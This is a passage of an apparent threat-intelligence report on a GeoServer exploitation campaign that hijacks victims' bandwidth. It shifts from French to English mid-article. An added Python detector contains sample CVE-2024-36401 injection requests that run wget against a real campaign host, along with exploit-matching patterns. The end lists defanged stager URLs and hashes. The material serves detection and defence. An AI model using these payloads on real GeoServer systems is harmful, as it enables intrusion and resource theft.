des fichiers suppl\u00e9mentaires.<\/figcaption><\/figure><span style=\"font-family: 'courier new', courier, monospace;\">z401<\/span> est le premier script identifi\u00e9 dans la Figure\u00a013. 
Il est con\u00e7u pour \u00eatre furtif\u00a0: il cr\u00e9e un r\u00e9pertoire cach\u00e9 et y place l\u2019ex\u00e9cutable principal, comme le montre la Figure\u00a014.<\/p>\n<p><figure id=\"attachment_156468\" aria-describedby=\"caption-attachment-156468\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156468 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-70557-156324-14.png\" alt=\"Capture d\u2019\u00e9cran d\u2019un terminal affichant des commandes\u00a0Unix pour supprimer, cr\u00e9er et naviguer dans des r\u00e9pertoires, ainsi qu\u2019une commande\u00a0wget permettant de t\u00e9l\u00e9charger un fichier depuis une adresse\u00a0IP donn\u00e9e.\" width=\"1000\" height=\"331\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-70557-156324-14.png 1118w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-70557-156324-14-786x260.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-70557-156324-14-768x254.png 768w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156468\" class=\"wp-caption-text\">Figure 14. 
Contenu de <span style=\"font-family: 'courier new', courier, monospace;\">z401<\/span> depuis <span style=\"font-family: 'courier new', courier, monospace;\">64.226.112[.]52<\/span>.<\/figcaption><\/figure>La Figure\u00a015 illustre le fonctionnement du second script mentionn\u00e9 dans la Figure\u00a013 (<span style=\"font-family: 'courier new', courier, monospace;\">z402<\/span>), qui pr\u00e9pare l\u2019environnement puis lance l\u2019ex\u00e9cutable principal en lui transmettant la cl\u00e9 d\u2019application.<\/p>\n<p><figure id=\"attachment_156479\" aria-describedby=\"caption-attachment-156479\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156479 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-73667-156324-15.png\" alt=\"Texte affich\u00e9 dans une fen\u00eatre de terminal montrant une interface en ligne de commande, avec du code impliqu\u00e9 dans la configuration d\u2019une variable d\u2019environnement nomm\u00e9e \u00ab\u00a0PATH\u00a0\u00bb.\" width=\"1000\" height=\"111\" srcset=\"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-73667-156324-15.png 1824w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-73667-156324-15-786x87.png 786w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-73667-156324-15-768x85.png 768w, https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-73667-156324-15-1536x170.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-156479\" class=\"wp-caption-text\">Figure 15. 
Contenu de <span style=\"font-family: 'courier new', courier, monospace;\">z402<\/span> depuis <span style=\"font-family: 'courier new', courier, monospace;\">64.226.112[.]52<\/span>.<\/figcaption><\/figure>Une fois lanc\u00e9, l\u2019ex\u00e9cutable fonctionne de mani\u00e8re furtive en arri\u00e8re-plan. Il surveille les ressources de l\u2019appareil et partage illicitement la bande passante de la victime d\u00e8s que possible. L\u2019attaquant g\u00e9n\u00e8re alors des revenus passifs.<\/p>\n<p>Les fichiers ex\u00e9cutables issus de ces tentatives d\u2019exploitation sont con\u00e7us pour interagir avec deux services l\u00e9gitimes\u00a0: l\u2019application et le SDK d\u00e9tourn\u00e9s. Tous deux offrent normalement aux utilisateurs un moyen de g\u00e9n\u00e9rer un revenu passif en partageant les ressources r\u00e9seau d\u2019appareils inactifs.<\/p>\n<p>Dans ce contexte, les attaquants d\u00e9tournent les fonctionnalit\u00e9s de l\u2019application ou du SDK. \u00c0 l\u2019image des mineurs de crypto-monnaie qui r\u00e9quisitionnent les ressources syst\u00e8me \u00e0 des fins lucratives, ces applications exploit\u00e9es exploitent elles aussi les ressources des appareils pour en tirer un gain financier. Cependant, contrairement aux mineurs malveillants, ce type d\u2019abus d\u2019applications ou de SDK reste g\u00e9n\u00e9ralement plus discret. 
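<\/p>\n<p>The two crafted requests of Figures 10 and 11 and the stager downloads of Figures 12 and 13 are exactly what a network sensor or a GeoServer access log sees, so they are the natural place to detect this chain. The Python below is an added example written for this article, not code from the report or from the attackers: it decodes a WFS request, looks for the publicly documented exploit form of CVE-2024-36401 (an exec(java.lang.Runtime.getRuntime(), '...') call smuggled into a property expression such as valueReference), pulls out the shell command it carries, and checks any download URL inside it against the host list and the transfer.sh URL shape from the indicators at the end of this article. The three sample requests are constructed, not captured traffic; 203.0.113.10 and the directory names in them are placeholders, and the regular expressions are the author's own, not the report's signatures.<\/p>\n

```python
"""Added example: flag CVE-2024-36401-style WFS requests and the stager downloads they carry.

The sample requests are constructed for this example (the report shows the real ones
only as screenshots); the host list and the download-URL shape come from the report's
indicators, and the exec() form is the publicly documented exploit pattern.
"""
import re
from urllib.parse import unquote_plus

# Campaign infrastructure from this report's indicator list.
CAMPAIGN_HOSTS = {"37.187.74.75", "64.226.112.52"}
CAMPAIGN_PORT = 8080

# GeoServer hands WFS property expressions (valueReference, propertyName, ...) to GeoTools,
# which evaluates them as XPath through commons-jxpath; the public exploit form for
# CVE-2024-36401 calls the extension function exec(java.lang.Runtime.getRuntime(), '<cmd>')
# from inside such an expression.
EXEC_CALL = re.compile(
    r"exec\s*\(\s*java\.lang\.Runtime\.getRuntime\s*\(\s*\)\s*,\s*(['\"])(?P<cmd>.*?)\1\s*\)",
    re.IGNORECASE | re.DOTALL,
)

# Download URL shape served by the campaign's transfer.sh instances:
# http://<ip>:8080/<10 random alphanumerics>/<letter + 3 digits, or letter + "log">
STAGER_URL = re.compile(
    r"https?://(?P<host>\d{1,3}(?:\.\d{1,3}){3}):(?P<port>\d+)/[A-Za-z0-9]{10}/[a-z](?:\d{3}|log)\b"
)

# Only the entities an XML body needs to hide a quote or bracket. html.unescape() is
# avoided on purpose: it also rewrites query-string fragments such as "&request=".
XML_ENTITIES = (("&apos;", "'"), ("&quot;", '"'), ("&lt;", "<"), ("&gt;", ">"), ("&amp;", "&"))


def normalise(raw: str) -> str:
    """Undo URL encoding (GET) and XML entity encoding (POST) before matching."""
    text = unquote_plus(raw)
    for entity, char in XML_ENTITIES:
        text = text.replace(entity, char)
    return text


def analyze_request(raw: str) -> dict:
    """Everything a triage pipeline wants to know about one captured WFS request."""
    text = normalise(raw)
    commands = [m.group("cmd").strip() for m in EXEC_CALL.finditer(text)]
    urls = list(STAGER_URL.finditer(text))
    known = any(
        m.group("host") in CAMPAIGN_HOSTS and int(m.group("port")) == CAMPAIGN_PORT
        for m in urls
    )
    return {
        "exploit": bool(commands),          # exec() call present
        "commands": commands,               # shell command(s) the attacker tried to run
        "stager_urls": [m.group(0) for m in urls],
        "known_infrastructure": known,      # download points at a listed host:port
    }


def classify(raw: str) -> str:
    """Coarse verdict for alert routing; infrastructure changes faster than the exploit form."""
    result = analyze_request(raw)
    if result["exploit"] and result["known_infrastructure"]:
        return "exploit-known-infrastructure"
    if result["exploit"]:
        return "exploit-attempt"
    if result["stager_urls"]:
        return "suspicious-download"
    return "benign"


# Constructed samples, not captured traffic. 203.0.113.10 (TEST-NET) and AbCdEfGhIj are
# placeholders; the second sample reuses a real z593 URL from the indicator table.
SAMPLE_GET = (
    "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue"
    "&typeNames=sf:archsites&valueReference=exec(java.lang.Runtime.getRuntime()"
    "%2C%27wget%20http%3A%2F%2F203.0.113.10%3A8080%2FAbCdEfGhIj%2Fz593%27) HTTP/1.1"
)
SAMPLE_POST = (
    '<wfs:GetPropertyValue service="WFS" version="2.0.0" '
    'xmlns:wfs="http://www.opengis.net/wfs/2.0" '
    'valueReference="exec(java.lang.Runtime.getRuntime(),&apos;wget -q '
    'http://64.226.112.52:8080/09KvYAUSHm/z593 -O /tmp/.z593&apos;)">'
    '<wfs:Query typeNames="sf:archsites"/></wfs:GetPropertyValue>'
)
SAMPLE_BENIGN = (
    "GET /geoserver/wfs?service=WFS&version=2.0.0&request=GetPropertyValue"
    "&typeNames=sf:archsites&valueReference=the_geom HTTP/1.1"
)

if __name__ == "__main__":
    for sample in (SAMPLE_GET, SAMPLE_POST, SAMPLE_BENIGN):
        print(classify(sample), analyze_request(sample)["commands"])
```

<p>Running the script prints one verdict per sample. The POST sample hides its quotes behind XML entities and the GET sample behind URL encoding, which is why the detector decodes before matching; a rule that only inspects the raw request line misses one of the two. The known-host check is kept separate from the exploit check on purpose: infrastructure rotates, while the exec() form and the download-then-run pattern do not.<\/p>\n<p>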
Such abuse attracts less attention and yields smaller profits for the threat actor, a trade-off that can keep an operation running longer while it evades detection.<\/p>\n<h3><a id=\"post-156324-_heading=h.mplwv1d1284o\"><\/a><strong>Analysis of the abused application<\/strong><\/h3>\n<p>A closer look at the binary the attackers installed on the victim's server shows that it was written in <a href=\"https:\/\/github.com\/dart-lang\" target=\"_blank\" rel=\"noopener\">Dart<\/a>, as Figure 16 illustrates. Dart is an open source programming language. Two main reasons appear to have driven this choice:<\/p>\n<ul>\n<li>SDK monetization: the attackers used Dart to embed the passive-income SDK and interact with its service. That interaction is what generates and collects the passive-income stream on the threat actor's behalf.<\/li>\n<li>Cross-platform support on Linux: the attackers also took advantage of Dart's inherent portability. They used it to compile the executable specifically for Linux, widening their pool of potential targets.<\/li>\n<\/ul>\n<p>The use of Dart for this purpose is notable: it may be an attempt to slip past detection signatures, which tend to focus on the languages more commonly associated with malware.<\/p>\n<figure id=\"attachment_156490\" aria-describedby=\"caption-attachment-156490\" style=\"width: 710px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-156490 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-76657-156324-16.png\" alt=\"Screenshot of a code-analysis interface listing code and functions mostly associated with the Dart language; one specific string is highlighted.\" width=\"710\" height=\"400\" \/><figcaption id=\"caption-attachment-156490\" class=\"wp-caption-text\">Figure 16. Binary built with Dart for cross-platform compatibility.<\/figcaption><\/figure>\n<h3><a id=\"post-156324-_heading=h.9bn26zgmj8bg\"><\/a><strong>Analysis of the abused SDK<\/strong><\/h3>\n<p>To establish what the SDK component used in this campaign actually is, we compared the SDK binary deployed by the attack with the official release available from the vendor's website. The two files were identical, byte for byte. 
That match suggests that the attackers run a legitimate, unmodified SDK, which may let them evade endpoint protection: there is no malicious file for a signature to match, only a benign binary doing an unauthorized job, so detection has to rest on context (who dropped it, where it lives, what spawned it) rather than on the file itself.<\/p>\n<h2><a id=\"post-156324-_heading=h.kpniz0doew6j\"><\/a>Conclusion<\/h2>\n<p>This ongoing campaign illustrates a significant shift in how adversaries monetize compromised systems. The attackers' core strategy is stealthy, persistent monetization rather than aggressive resource exploitation. They achieve it by deploying executables that repurpose legitimate passive-income services, quietly using device resources for activities such as bandwidth sharing. The approach favours long-term, low-visibility revenue over techniques that are easy to spot.<\/p>\n<p>To counter this threat, we strongly recommend applying the available patches and updates as soon as possible. Until an exposed GeoServer instance is patched, treat any outbound download initiated by the GeoServer service account, especially to unfamiliar hosts on TCP port 8080, as a signal worth investigating; the indicators at the end of this article list the hosts and file hashes observed in this campaign.<\/p>\n<p>Palo Alto Networks customers are better protected from the vulnerabilities and malware discussed above through the following products and services:<\/p>\n<ul>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-threat-prevention\" target=\"_blank\" rel=\"noopener\">Advanced Threat Prevention<\/a> can block the attacks with best practices via Threat Prevention signature 95463. In addition, ATP includes machine learning-based protection that can detect exploitation traffic in real time.<\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-wildfire\" target=\"_blank\" rel=\"noopener\">Advanced WildFire<\/a> can prevent the transfer of the custom executable.<\/li>\n<li><a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-url-filtering\" target=\"_blank\" rel=\"noopener\">Advanced URL Filtering<\/a> and <a href=\"https:\/\/www.paloaltonetworks.com\/network-security\/advanced-dns-security\" target=\"_blank\" rel=\"noopener\">Advanced DNS Security<\/a> can block malicious URLs associated with this activity.<\/li>\n<\/ul>\n<p>If you think you may have been compromised or have an urgent matter, contact the <a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">Unit 42 Incident Response team<\/a> or call one of the numbers below:<\/p>\n<ul>\n<li>North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)<\/li>\n<li>UK: +44 20 3743 3660<\/li>\n<li>Europe and Middle East: +31.20.299.3130<\/li>\n<li>Asia: +65.6983.8730<\/li>\n<li>Japan: +81 50 1790 0200<\/li>\n<li>Australia: +61.2.4062.7950<\/li>\n<li>India: 000 800 050 45107<\/li>\n<\/ul>\n<p>Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the <a href=\"https:\/\/www.cyberthreatalliance.org\" target=\"_blank\" rel=\"noopener\">Cyber Threat Alliance<\/a>.<\/p>\n<h2><a id=\"post-156324-_heading=h.2jmhtg5znzny\"><\/a>Indicators of compromise<\/h2>\n<h3><a id=\"post-156324-_heading=h.11vvj4t9i204\"><\/a>IP addresses and TCP ports used for the campaign infrastructure<\/h3>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">37.187.74[.]75:8080<\/span><\/li>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">64.226.112[.]52:8080<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-156324-_heading=h.tp7ld5ygwo7u\"><\/a>Campaign artifacts<\/h3>\n<table style=\"width: 101.05%;\">\n<tbody>\n<tr style=\"height: 24px;\">\n<td style=\"text-align: center; height: 24px; width: 59.348%;\"><strong>File SHA256<\/strong><\/td>\n<td style=\"text-align: center; height: 24px; width: 21.8553%;\"><strong>URL the file was served from<\/strong><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">89f5e7d66098ae736c39eb36123adcf55851268973e6614c67e3589e73451b24<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/w1wOYGVLEX\/a101<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">6db4b685f413a3e02113677eee10a29c7406414f7f4da611f31d13e3f595f85d<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/IyxzymKCp2\/a102<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; 
font-family: 'courier new', courier, monospace;\">4e4a467abe1478240cd34a1deaef019172b7834ad57d46f89a7c6c357f066fdb<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/cE58oqrYGO\/a193<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">4e40a0df8f4ba4a87ab8fc64950c67f6725a7e8f14a0a84a4ed79b3a8924ba19<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/YDjV1ocro3\/a401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">663970530e764f91b0be43936331e6c0a93610db6b86c6c4b64de270ae4d4630<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/3g5eBN8nqv\/a402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">7c18fe9da63c86f696f9ad7b5fcc8292cac9d49973ba12050c0a3a18b7bd1cc9<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/JadF0ucQNf\/a593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">84ee11f40da3538e4601456912c3efa0e92a903948812fd17fe650c5f7ac33ad<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, 
monospace;\">hxxp:\/\/37.187.74[.]75:8080\/Do4YwzvAJN\/alog<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">0971264967ba8d461ce98f86b90810493c5e22fc80bf61f0d0eb7a2599a7f77a<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/DQ5ydzkPnK\/c401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">491f5af9d29f52a6df026159a8ebd27ee6e27151ea78c4782eb05b2c5d39bfc3<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/a8HejAHngH\/c402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">a852133ff7f24b14e4224e7052f6d309353b4838fe5f17d25c712d7a1dd6e80a<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/vLs5vxpDgV\/c593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">b66c64ccd7b9c96fad53f6d3aa0441e46eca899ad8d97964573e41c94fccddba<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/KaMJw2fsDW\/d101<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, 
monospace;\">f340abe5689e51cf78b10165cb93ab8a2988d0fedd0e74c74fc23ac2dca93a13<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/TMuAS1wp8m\/d102<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">fc28f97f818d07fd8824333de26e5a0ca0d3fe7233d86f7e227e4838cfea0ca4<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/iKA3jGXk6x\/d193<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">7c0c69aa0dcfc937c1fef8d42c74f7e46d128898c1d99d3362f2d18397be36ae<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/fK4SCflkNg\/d401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">33aad585d6280d1921b5f46f8894ee05d426c7751c2133ed5484bf65af587576<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/Y1WT747MRP\/d402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">2c5581572ec4877df8ec3e5d2b30bfff5718ecd27d8b3dbe2f393aa5821e7ddd<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, 
monospace;\">hxxp:\/\/37.187.74[.]75:8080\/H0cwXMzCrJ\/d593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">0e2b92991186bc8a817e0187a9b58928969350bc8d8ad7e6b6cd91c185a7e03c<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/XA8Dkr1CJ4\/dlog<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">5bc5dfeaeb43fb1e967cad028f8d2c48f5db17ee6c23c383faee74455c2f1f33<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/52F6SqfuuS\/e101<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">8b25144ad17d023f67477be4791db45d9197d7cfb666b3a5ccc1b1c0e4bae3af<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/7kS5qiHwg8\/e102<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">8aafb9965e946e5d4be085a1373abc750a1488ff78e6e082cc36ff20ff328465<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/ei0Ul7l75J\/e193<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, 
monospace;\">a13a07d15d94c996d8b7e8ed633073f6a3e2268a8d14363f16ad48160b85df08<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/kGQtGhOpCP\/elog<\/span><\/td>\n<\/tr>\n<tr style=\"height: 51px;\">\n<td style=\"height: 51px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">cdae958629383c4dba22a115615d8a63211bbccb06335cd1c4b5e2c2aa3fee77<\/span><\/td>\n<td style=\"height: 51px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/wHNOFLazdK\/glog (from d401)<\/span><\/td>\n<\/tr>\n<tr style=\"height: 51px;\">\n<td style=\"height: 51px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">bbdda70f0c4a3de4ec955e134ad46895ac931e21b930837a85633277128ab7d2<\/span><\/td>\n<td style=\"height: 51px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/wlLiXFNtjU\/hlog (from c401)<\/span><\/td>\n<\/tr>\n<tr style=\"height: 51px;\">\n<td style=\"height: 51px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">4fd789a19db35e054a5135466d610452bea607a11b7ec765b5474847c22e637c<\/span><\/td>\n<td style=\"height: 51px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/gmhm4lmSLO\/plog (from z401)<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">43b49294b778d4489c69922ff3aca27964a04e0f08bcc830108dc83261a0b205<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, 
monospace;\">hxxp:\/\/37.187.74[.]75:8080\/QF8plwpY8Y\/s401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">ae706c149497c2fc809682e8827996ea3ceb7bcecddd87be7543d1dca4853470<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/zJ03zmSrz6\/s402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">3fd7794be80782b11a09f51ac8cbf2147e9d79303923f279d610ee45e12506eb<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/22mINruojN\/s593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 51px;\">\n<td style=\"height: 51px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">e25d6134c6a0573ded1d340f609dd71d15934ca165ea79d47898aa37a5185415<\/span><\/td>\n<td style=\"height: 51px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/3pHrSu54Pf\/slog (from s401)<\/span><\/td>\n<\/tr>\n<tr style=\"height: 51px;\">\n<td style=\"height: 51px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">085da541d7555ac6afcacd5899027c3fa4132c1eccfb3d8223794c4e0e3eb361<\/span><\/td>\n<td style=\"height: 51px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/vPN5rgRMTz\/wlog (from a401)<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, 
monospace;\">2aa6f95dbe8d17e8e70db677808c96ee956c36b7cc8f274435173cfed0b1f5af<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/T8VevroEJT\/z401<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">2b176eb8afa0b089ee8fb072c68c6fdcfe4b2f034c776cc32064f26c0e6c69a3<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/uCX4Nl2Pwu\/z402<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">915d1bb1000a8726df87e0b15bea77c5476e3ec13c8765b43781d5935f1d2609<\/span><\/td>\n<td style=\"height: 25px; width: 21.8553%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">hxxp:\/\/37.187.74[.]75:8080\/3twwHaJzxo\/z593<\/span><\/td>\n<\/tr>\n<tr style=\"height: 25px;\">\n<td style=\"height: 25px; width: 59.348%;\"><span style=\"font-weight: 400; font-family: 'courier new', courier, 